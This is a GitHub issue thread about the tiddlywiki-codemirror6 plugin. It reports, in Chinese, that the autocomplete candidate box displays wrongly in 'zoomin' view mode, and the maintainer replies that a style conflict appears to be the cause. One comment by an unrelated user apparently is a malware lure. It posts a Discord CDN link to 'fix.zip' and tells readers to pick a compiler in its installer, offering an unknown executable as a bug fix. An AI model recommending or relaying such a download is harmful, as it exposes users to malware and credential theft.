### ISSUE TITLE
[BUG] 使用视图模式zoomin时，候选框显示异常，使用其他视图模式正常

### ISSUE THREAD

**Issue by LuciferMJ** [oeyoews/tiddlywiki-codemirror6#97]
### Describe the bug

使用视图模式zoomin时，候选框显示异常，使用其他视图模式正常

### Configuration

- Version [e.g. v5.1.24]
- Saving mechanism [e.g. Node.js, TiddlyDesktop, TiddlyHost etc]
- Plugins installed [e.g. Freelinks, TiddlyMap]

**Comment by Dominic54321** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by oeyoews** [comment]
看起来是样式有冲突了
